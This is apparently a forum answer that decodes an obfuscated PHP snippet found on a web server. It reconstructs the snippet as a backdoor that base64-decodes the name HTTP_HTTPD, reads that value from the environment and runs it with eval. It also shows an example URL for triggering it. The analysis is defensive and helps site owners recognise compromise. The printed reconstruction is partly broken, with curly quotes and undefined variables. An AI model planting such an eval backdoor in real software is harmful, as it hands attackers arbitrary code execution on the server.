The functions in php you're looking for appear to be a combination of base64_decode
and urldecode.
For example:
urldecode("\x6d\x79s\x74r\x31s\x311\x30");
gives "mystr1s110"
Also part of the string in the eval statement base64_decodes to:
function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}
Those encoded strings all reference variables defined earlier, for example \x6d\x79s\x74r\x31s\x311\x30
url-decodes to mystr1s110
This looks very nasty to me. Although I'm no security expert. I would just php -a and figure out what chunks are decoded how, then reconstruct the code from there.
On a side note. You pulled this off the server, right?
EDIT:
Was kind of intrigued by this. After a complete decode I got this:
<?php
if(!function_exists("myFunction2")){
class myClass {
static $myVar1="SFRUUF9IVFRQRA==";
static $myVar2=“base64_decode”;
}
function myFunction1($myArg)
{
${$myVar4}=myClass::$myVar2; // myClass::$myVar2 is just "base64_decode"
return $myVar4( myClass::${$myArg} ); // reuturning base64_decode of the argument
}
function myFunction2($myArg2)
{
return myClass::${$myVar3}
}
$myFinalVar=@getenv(myFunction1('myVar1')); //just gets env variable of base64 decode of myVar1
if($myFinalVar) {
@eval($myFinalVar); //executes
}
?>
Looks to me like its a script designed to execute a script on another server. (i.e. they could just hit the web address with their script in url and it would execute. SFRUUF9IVFRQRA==
decodes to HTTP_HTTPD
so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php
and it would run whatever they wanted on your server.